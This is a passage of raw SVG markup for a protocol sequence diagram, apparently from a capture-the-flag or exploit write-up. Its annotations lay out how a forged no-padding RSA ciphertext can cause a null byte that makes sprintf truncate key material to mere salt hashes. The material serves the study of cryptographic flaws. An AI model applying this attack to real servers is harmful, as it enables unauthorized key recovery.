font-weight="normal" text-decoration="normal" x="1377.828723910014" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="332.59730472900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the rest of the bytes left null.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="353.95872442900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="375.320144129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1145.9287300135297" y="375.320144129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266808 383.864712009 L 1012.5425097766808 383.864712009 L 1012.5425097766808 411.634557619 L 944.6843998630142 411.634557619" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(927.0968309766808,411.634557619) translate(-927.0968309766808,-411.634557619)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 944.8980140600141 402.7339660773334 L 927.0968309766808 411.634557619 L 944.8980140600141 420.53514916066666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="245.49111040903642" y="443.676687169" width="440.225085360531" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="245.49111040903642" y="465.038106869" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="245.49111040903642" y="486.399526569" width="488.24175129604737" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Reply with the </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="398.3953203122786" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="676.1619829099349" y="462.901964899" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="484.263384599" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="248.69532336403643" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="310.9453233640364" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">812B50867EFB281491D8F9285D007914</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="722.7286485593489" y="505.624804299" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 514.169372179 L 91.0761297237728 514.169372179" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(73.48856083743945,514.169372179) translate(-73.48856083743945,-514.169372179)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 91.28974392077279 505.26878063733335 L 73.48856083743945 514.169372179 L 91.28974392077279 523.0699637206667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="109.44695066577279" y="546.211501729" width="516.5750976629297" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="567.572921429" width="580.408419711117" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="588.9343411289999" width="323.79175720882813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="610.2957608289998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="631.6571805289998" width="304.6251007146875" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="653.0186002289997" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="674.3800199289997" width="560.3917633123438" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="695.7414396289996" width="535.7917572088281" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="717.1028593289996" width="512.1417633123438" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="738.4642790289995" width="67.85842667293946" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="759.8256987289994" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="781.1871184289994" width="502.4917694158594" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="802.5485381289993" width="556.4250885076563" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="823.9099578289993" width="162.65841971111695" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="845.2713775289992" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="866.6327972289992" width="653.0250640935938" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="887.9942169289991" width="630.375093085293" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="909.355636628999" width="605.3584152288477" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="930.717056328999" width="641.5584312505762" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="952.0784760289989" width="729.9917541570703" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="973.4398957289989" width="735.4084144659082" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="994.8013154289988" width="505.39176331234376" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="1016.1627351289987" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="109.44695066577279" y="1037.5241548289987" width="581.8917723722498" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="565.436779459" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Produce a 32-byte-long message called </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="514.0011697242884" y="565.436779459" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that the Server will decrypt with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="441.8178201149134" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="680.3011575172571" y="586.798199159" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="608.1596188589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded public key.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="629.5210385589999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="650.8824582589998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Two things are essential here:</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="672.2438779589997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="693.6052976589997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(1) the fate of this message is to be decrypted with the</text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">HARDCODED PUBLIC KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="394.0011697242884" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and then </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="496.2011666725306" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="543.3011651466517" y="714.9667173589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ed with a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="736.3281370589996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">randomly generated secret text 31 ASCII-printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="757.6895567589995" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">bytes.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="779.0509764589995" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="800.4123961589994" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(2) the result of these two operations will then be</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="821.7738158589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">concatenated with the salt </text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="386.48450712663214" y="821.7738158589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using sprintf and the %s</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="843.1352355589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">format string</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="262.55115751725714" y="843.1352355589993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="864.4966552589992" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="885.8580749589992" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If we can discover a phony ciphertext that, when decrypted with</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="112.65116362077279" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypy()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="354.60116056901495" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, with the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="455.2678246925501" y="907.2194946589991" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">HARDCODED PUBLIC KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and the </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="195.81782774430795" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="396.91783384782354" y="928.580914358999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option, yields a bytestring that</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">begins with a byte between </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="396.601175827804" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="446.5845094154505" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="496.9178414772181" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7f</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="541.2178407142786" y="949.942334058999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, then we will have a</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="971.3037537589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">1 in 92 chance of tricking the Server into generating a </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="663.4011636207728" y="971.3037537589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that begins with a </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="299.7178292701868" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">NULL BYTE</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="421.10116056901495" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">. This will cause </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="585.3678231666712" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="687.5011544654993" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="737.8344865272669" y="992.6651734589989" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1014.0265931589988" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">to be nothing but hashes of their respective salts.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1035.3880128589988" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.65116362077279" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result of this search as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="444.2511697242884" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="681.78451017839" y="1056.7494325589987" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 1065.294000439 L 169.61494948743945 1065.294000439 L 169.61494948743945 1093.063846049 L 101.7568395737728 1093.063846049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(84.16927068743945,1093.063846049) translate(-84.16927068743945,-1093.063846049)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 101.97045377077279 1084.1632545073332 L 84.16927068743945 1093.063846049 L 101.97045377077279 1101.9644375906666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="290.0994368441256" y="1125.105975599" width="399.02509842586915" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="293.3036497991256" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="350.0369833867721" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.5703238408737" y="1144.331253329" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 84.16927068743945 1152.875821209 L 877.4671325403475 1152.875821209" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(895.0547014266808,1152.875821209) translate(-895.0547014266808,-1152.875821209)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 877.2535183433475 1143.9752296673332 L 895.0547014266808 1152.875821209 L 877.2535183433475 1161.7764127506666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="952.3745109550141" y="1184.917950759" width="623.2084404058496" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="1206.279370459" width="437.2417541570703" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Decrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1041.228725435893" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1278.7620658899946" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1333.89540100352" y="1204.143228489" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="1225.504648189" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1148.445392611186" y="1225.504648189" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266808 1234.049216069 L 1012.5425097766808 1234.049216069 L 1012.5425097766808 1261.819061679 L 944.6843998630142 1261.819061679" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(927.0968309766808,1261.819061679) translate(-927.0968309766808,-1261.819061679)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 944.8980140600141 1252.9184701373333 L 927.0968309766808 1261.819061679 L 944.8980140600141 1270.7196532206667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1293.861191229" width="425.9917694158594" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1315.222610929" width="500.7584138937036" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="963.0552208050141" y="1336.584030629" width="435.14176331234376" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1313.086468959" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Generate a string of 31 random, printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">characters (between ASCII codes </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1302.9260902541546" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1352.909423841801" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1403.2427559035686" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7e</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1452.8094215529827" y="1334.447888659" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="966.2594337600141" y="1355.809308359" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1198.3094368117718" y="1355.809308359" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1364.353876239 L 1023.2232196266808 1364.353876239 L 1023.2232196266808 1392.123721849 L 955.3651097130141 1392.123721849" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(937.7775408266808,1392.123721849) translate(-937.7775408266808,-1392.123721849)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 955.5787239100141 1383.2231303073333 L 937.7775408266808 1392.123721849 L 955.5787239100141 1401.0243133906667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="973.735930655014" y="1424.165851399" width="579.8917594976465" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1445.527271099" width="558.4917388982813" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1466.888690799" width="496.92508850765626" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1488.250110499" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1509.6115301989998" width="546.3250976629297" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1060.2068138370648" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1256.8901481876508" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1312.0234833011762" y="1443.391129129" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_encrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1464.752548829" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded, 1024-bit public RSA key, with the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" x="976.940143610014" y="1486.113968529" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1178.0401497135297" y="1486.113968529" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option set ("Textbook RSA").</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1507.475388229" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="976.940143610014" y="1528.8368079289999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the 128-byte result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1263.690143610014" y="1528.8368079289999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 937.7775408266808 1537.381375809 L 1033.9039294766808 1537.381375809 L 1033.9039294766808 1565.151221419 L 966.0458195630141 1565.151221419" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(948.4582506766808,1565.151221419) translate(-948.4582506766808,-1565.151221419)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 966.2594337600141 1556.2506298773333 L 948.4582506766808 1565.151221419 L 966.2594337600141 1574.0518129606667 Z"/></g></g><g><g><rect fill="white" stroke="none" x="259.2775241008883" y="1597.193350969" width="503.39176331234376" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="262.4817370558883" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send 128-byte </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="415.6150683547164" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="668.7817401076461" y="1616.418628699" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Client</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1624.963196579 L 112.4375494237728 1624.963196579" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="8.544567879999999"/><g transform="translate(94.84998053743945,1624.963196579) translate(-94.84998053743945,-1624.963196579)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 112.65116362077279 1616.0626050373332 L 94.84998053743945 1624.963196579 L 112.65116362077279 1633.8637881206666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="973.735930655014" y="1657.005326129" width="483.17508993816773" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1678.366745829" width="503.9584117956201" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="973.735930655014" y="1699.7281655289999" width="185.5917540617029" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="bold" text-decoration="normal" 